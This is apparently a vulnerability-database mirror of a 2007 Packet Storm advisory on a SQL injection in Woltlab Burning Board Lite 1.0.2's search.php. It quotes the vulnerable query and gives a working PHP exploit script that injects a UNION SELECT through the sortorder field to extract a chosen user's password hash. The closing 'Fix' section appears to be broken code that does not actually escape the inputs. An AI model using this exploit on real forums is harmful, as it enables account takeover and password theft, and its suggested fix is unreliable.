Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormNBBNPACKETSTORM:61981
HistoryDec 20, 2007 - 12:00 a.m.

wbb-sql.txt

2007-12-2000:00:00
NBBN
packetstormsecurity.com
15
JSON
`In Woltlab Burning Board Lite(1.0.2) is a SQL-Injection Vulnerability in file:   
search.php :  
Line: 510-515  
  
if(!$savepostids) eval("error(\"".$tpl->get("error_searchnoresult")."\");");  
$result=$db->query_first("SELECT searchid FROM bb".$n."_searchs WHERE   
postids='$savepostids' AND showposts='$_POST[showposts]' AND   
sortby='$_POST[sortby]' AND sortorder='$_POST[sortorder]' AND   
userid='$wbbuserdata[userid]' AND ipaddress='$REMOTE_ADDR'");  
if($result['searchid']) {  
header("Location:   
search.php?searchid=$result[searchid]&sid=$session[hash]");  
exit();  
}  
  
There no addslashes() in $_POST[showposts], $_POST[sortby].   
$_POST[sortorder].  
  
  
== Exploit ==   
<?php  
$host = $argv[1];  
$path = $argv[2];  
$searchstring = $argv[3];  
$userid = $argv[4];  
If ($argc <= 4)  
{  
echo "Usage: filename.php [host] [path] [searchstring] [user-id] \n Examples:  
\n php filename.php localhost /wbblite/search.php Computer 1\n php   
filename.php localhost /search.php Board 1\n";  
die;  
}  
$sqlinjecting   
= "searchstring=$searchstring&searchuser=&name_exactly=1&boardids%5B%5D=*&topiconly=0&showposts=0&searchdate=0&beforeafter=after&sortby=lastpost&sortorder=%27%20UNION%20SELECT%20password%20FROM%20bb1_users%20WHERE%20userid=$userid%20/*&send=send&sid=&submit=Suchen";  
$con = fsockopen($host, 80);  
echo("==Woltlab Burning Board LITE SQL-Injection Exploit founded and coded   
by NBBN. \n\n\n");  
sleep(1);  
fputs($con, "POST $path HTTP/1.1\n");  
fputs($con, "Host: $host\n");  
fputs($con, "Content-type: application/x-www-form-urlencoded\n");  
fputs($con, "Content-length: ". strlen($sqlinjecting) ."\n");  
fputs($con, "Connection: close\n\n");  
fputs($con, "$sqlinjecting\n");  
  
while(!feof($con)) {  
$res .= fgets($con, 128);  
}  
echo("Well done...\n");  
fclose($con);  
  
echo $res;   
echo "The password-hash is in search.php?searchid=[Hash]\n";  
$the_hash = substr($res,strpos($res,'searchid=')+9,32);  
echo "Hash: $the_hash\n\n";  
?>  
  
  
== Fix ==  
  
if(!$savepostids) eval("error(\"".$tpl->get("error_searchnoresult")."\");");  
$result=$db->query_first("SELECT searchid FROM bb".$n."_searchs WHERE   
postids='$savepostids' AND showposts='.addslashes($_POST[showposts]).' AND   
sortby='.addslashes($_POST[sortby]).' AND   
sortorder='.addslashes($_POST[sortorder]).' AND userid='$wbbuserdata[userid]'   
AND ipaddress='$REMOTE_ADDR'");  
if($result['searchid']) {  
header("Location:   
search.php?searchid=$result[searchid]&sid=$session[hash]");  
exit();  
}  
  
`
JSON